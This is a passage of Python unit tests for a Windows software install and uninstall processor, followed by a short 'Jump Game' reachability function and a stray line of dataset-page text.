        fb.report_entry_removal_finished.assert_not_called()
    def test_processing2(self):
        # Everything already installed; only the removal path must run:
        # no downloads, no installs, every uninstall handler exercised.
        fb = NonCallableMock(spec_set=Feedback)
        set_install_manager_data(True, True, 'example3_final:1.0\r\nexample3:1.1')
        set_download_manager_data(set())
        data = get_app_config_from(load_yaml_from_test_dir('app_list'))
        software_processor.process('C:\\temp', data, fb)
        fb.report_checking_software.assert_called_once()
        download_manager.filter_present.assert_called_once_with([])
        download_manager.download.assert_not_called()
        install_manager.install_msi.assert_not_called()
        install_manager.remove_file.assert_called_once_with(Path('C:/temp/example4'), 'example4.exe')
        install_manager.remove_directory.assert_called_once_with(Path('C:/temp/example5/0.5'))
        self.assert_called_exactly_with_no_order(install_manager.run_file,
                                                 call('C:\\Program Files\\Example1\\1.0\\uninstall.exe', None))
        self.assert_called_exactly_with_no_order(install_manager.run_command,
                                                 call('manager', ['list']), call('manager', ['list']),
                                                 call('manager', ['uninstall', 'example3_final:1.0']))
        self.assert_called_exactly_with_no_order(install_manager.uninstall_msi, call('pc1235', ['/q']))
        fb.confirm_operations.assert_called_once_with([], list(data.to_uninstall), [])
        fb.report_installation_started.assert_not_called()
        fb.report_installation_finished.assert_not_called()
        fb.report_removal_started.assert_called_once()
        fb.report_removal_finished.assert_called_once()
        self.assert_called_exactly_with_no_order(fb.report_entry_removal_started,
                                                 *(call(item) for item in data.to_uninstall))
        self.assert_called_exactly_with_no_order(fb.report_entry_removal_finished,
                                                 *(call(item) for item in data.to_uninstall))
        fb.report_entry_installation_started.assert_not_called()
        fb.report_entry_installation_finished.assert_not_called()
    def test_processing3(self):
        # An empty app list: nothing touched, only "no changes" reported.
        fb = NonCallableMock(spec_set=Feedback)
        set_download_manager_data(set())
        data = AppData([])
        software_processor.process('C:\\temp', data, fb)
        fb.report_checking_software.assert_called_once()
        download_manager.download.assert_not_called()
        install_manager.install_msi.assert_not_called()
        install_manager.run_file.assert_not_called()
        install_manager.run_command.assert_not_called()
        install_manager.uninstall_msi.assert_not_called()
        install_manager.unpack_archive.assert_not_called()
        install_manager.remove_directory.assert_not_called()
        install_manager.copy_file.assert_not_called()
        install_manager.remove_file.assert_not_called()
        fb.confirm_operations.assert_not_called()
        fb.report_installation_started.assert_not_called()
        fb.report_installation_finished.assert_not_called()
        fb.report_removal_started.assert_not_called()
        fb.report_removal_finished.assert_not_called()
        fb.report_entry_removal_started.assert_not_called()
        fb.report_entry_removal_finished.assert_not_called()
        fb.report_entry_installation_started.assert_not_called()
        fb.report_entry_installation_finished.assert_not_called()
        fb.report_software_set_no_changes.assert_called_once()
    def test_processing4(self):
        # An entry with an install source but no recognizable uninstall
        # method must fail fast with UnknownUninstallTypeError.
        fb = NonCallableMock(spec_set=Feedback)
        set_download_manager_data(set())
        data = AppData([AppEntry(name='test', installer_url='http://example.com/file.exe')])
        with self.assertRaises(UnknownUninstallTypeError) as c:
            software_processor.process('C:\\temp', data, fb)
        self.assertEqual(c.exception.app_entry, data.to_uninstall[0])
    def test_processing5(self):
        # An entry marked keep=True with no recognizable install method must
        # fail fast with UnknownInstallTypeError.
        fb = NonCallableMock(spec_set=Feedback)
        set_download_manager_data(set())
        data = AppData([AppEntry(name='test', uninstaller_path='C:\\uninst.exe', keep=True)])
        with self.assertRaises(UnknownInstallTypeError) as c:
            software_processor.process('C:\\temp', data, fb)
        self.assertEqual(c.exception.app_entry, data.to_install[0])
|
def maxReach(arr):
    """Return True when the last index of *arr* is reachable.

    Each element is the maximum jump length from that position (the classic
    "Jump Game" check).  Runs in O(n) time and O(1) space.
    """
    maxReachPos = 0
    for i, num in enumerate(arr):
        if maxReachPos < i:
            # Position i can never be reached, so neither can the end.
            return False
        maxReachPos = max(maxReachPos, num + i)
        # Bug fix: the last index is len(arr) - 1, not len(arr); the original
        # demanded a jump past the end and wrongly rejected e.g. [1, 0].
        if maxReachPos >= len(arr) - 1:
            return True
    # Only reachable for empty input, which has no last index.
    return False


arr = [1, 0, 8, 8, 4, 2, 0, 0, 2, 1, 0]
res = maxReach(arr)
print(res)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.